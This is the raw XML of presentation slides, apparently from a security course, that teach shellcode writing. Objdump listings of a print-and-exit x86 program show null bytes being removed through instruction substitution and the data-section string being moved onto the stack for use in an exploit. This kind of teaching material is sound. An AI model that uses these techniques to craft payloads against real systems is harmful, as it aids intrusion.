                </a:solidFill>
              </a:rPr>
              <a:t>00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x9,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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8048094:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x80</a:t>
            </a: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 // exit()</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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8048096:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x1,%eax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804809b:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r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rgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x0,%ebx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80480a0:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int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$0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH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Null Bytes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 we remove the null bytes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Replace instructions which have 0 bytes with equivalent instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Has 0 bytes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> $0x04, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Equivalent instructions (without 0 bytes):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> $0x04, %al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3734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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fix: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Null Bytes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764704"/>
            <a:ext cx="8229600" cy="5532909"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8048060:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c0    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xor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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRP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8048062:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    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xor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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRP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8048064:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c9    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xor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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRP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8048066:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d2    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xor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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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8048068:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>04    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mov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$0x4,%al</a:t>
            </a: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804806a:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>01    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mov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$0x1,%bl</a:t>
            </a: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804806c:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>08    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mov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$0x8,%dl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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 // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exit()</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>804807c:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>01    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1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mov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$0x1,%al</a:t>
            </a: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804807e:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 8048080:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH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Null Bytes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Need to remove \x00 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By exchanging instructions with equivalent instructions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6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60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2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The current shellcode references a string from the data section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In an exploit we can only execute code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>not (yet) modify data!</a:t>
            </a:r>
          </a:p>
          <a:p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Remove dependency on the data section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By storing the same data directly in the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And move it to the stack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92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592" y="1268413"/>
            <a:ext cx="8568952" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>08048080 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;: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// print</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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8048080:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>04 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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$0x4,%eax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8048085:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r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01 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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$0x1,%ebx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804808a:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a4 90 04 08     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x80490a4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,%ecx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804808f:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ba</a:t>
            </a:r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09 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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$0x9,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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8048094:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
